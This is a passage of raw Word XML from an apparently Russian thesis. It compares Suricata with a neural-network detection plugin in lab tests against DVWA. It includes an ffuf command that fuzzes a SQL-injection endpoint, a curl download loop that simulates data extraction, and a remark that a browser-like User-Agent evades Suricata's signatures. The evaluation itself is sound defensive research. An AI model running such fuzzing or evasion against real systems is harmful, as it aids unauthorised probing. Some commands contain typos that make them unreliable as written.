        <w:t xml:space="preserve"> используют характерные строки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">которые попадают под сигнатуры. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с настройкой User-Agent по умолчанию также был обнаружен. Всего зафиксировано 47 срабатываний. Однако при использовании кастомного User-Agent, имитирующего обычный браузер, сигнатуры </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> не сработали, что демонстрирует слабость сигнатурного подхода против инструментов с изменяемыми заголовками.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C917D5F" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00F3371A" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E976B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Итого: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E976B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E976B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>47</w:t>
      </w:r>
      <w:r w:rsidRPr="00E976B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> срабатываний, нейросетевой плагин — 210 срабатываний</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54838CE9" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="001D324E" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C1B9F5" w14:textId="50CA530C" w:rsidR="008E0171" w:rsidRPr="00DD2F4C" w:rsidRDefault="000A1CD6" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.9 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Тест</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9. </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fuzzing</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0407DAC0"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t xml:space="preserve">Для тестирования использовался инструмент </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, осуществляющий многопоточный перебор параметров веб-приложения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5957B63D" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRDefault="000A1CD6" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C5FBD0F" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00ED4CBB" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ffuf u http://192.168.0.104/vulnerabilities/sqli/?id=FUZZ&amp;Submit=Submit -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/common.txt -t 100 -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144159AF" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="00ED4CBB" w:rsidRDefault="009534A2" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46184164" w14:textId="5DE2E572" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">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t>Данная техника направлена на выявление скрытых параметров и уязвимых точек входа веб-приложения путём подстановки большого количества значений.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B66792">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Процесс обнаружения показан на рисунке 3</w:t>
      </w:r>
      <w:r w:rsidR="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9173FE" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C12A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50F8437B" wp14:editId="5F41AD75">
            <wp:extent cx="5610225" cy="2418313"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1697546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46122" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId59"/>
                    <a:srcRect l="53875" t="6465" b="46374"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5631633" cy="2427541"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="061BA8E0" w14:textId="007857CF" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="415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009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Обнаружение </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>фаззинга</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E2A456E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B685AB"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t xml:space="preserve">Высокая интенсивность параллельных запросов формирует аномальный паттерн трафика, который нейросетевой плагин успешно идентифицировал как подозрительную активность. </w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Итого: классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 0 срабатываний, нейросетевой плагин — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">121 </w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>срабатывани</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BC7AEE" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRPr="001D324E" w:rsidRDefault="000A1CD6" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0332E2F1" w14:textId="07EEA342" w:rsidR="008E0171" w:rsidRPr="000A1CD6" w:rsidRDefault="000A1CD6" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.10 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Тест 10. Извлечение данных </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5238E7A7"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t>Для оценки способности системы обнаруживать нетипичные объёмы исходящего трафика проводилась имитация автоматизированного скачивания ресурсов сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FBDB82" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRPr="001D324E" w:rsidRDefault="000A1CD6" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C1BE309" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00ED4CBB" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For i in {</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>50}; do curl - s http://192.168.0.104/dvwa/images/logo.png &gt; /dev/null; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D949F00" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="00ED4CBB" w:rsidRDefault="009534A2" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E1BA4C" w14:textId="58B7357F"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t xml:space="preserve">Целью данного теста являлась проверка способности нейросетевого модуля обнаруживать аномальные объёмы передаваемых данных, которые могут свидетельствовать о несанкционированном копировании конфиденциальной информации. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Процесс обнаружения показан на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B4A9FC"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47EA011D" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75A8514B" wp14:editId="5543AABF">
            <wp:extent cx="5940425" cy="3146425"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1819378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78450" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="3146425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="773983D5" w14:textId="5AE5EE8B" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="415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9534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Обнаружение атаки, путем извлечения данных</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74837B76" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73244C15"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t xml:space="preserve">Несмотря на то, что каждый отдельный запрос являлся легитимным, высокая частота обращений сформировала аномальный паттерн трафика, который нейросетевой плагин успешно идентифицировал как подозрительную активность. </w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
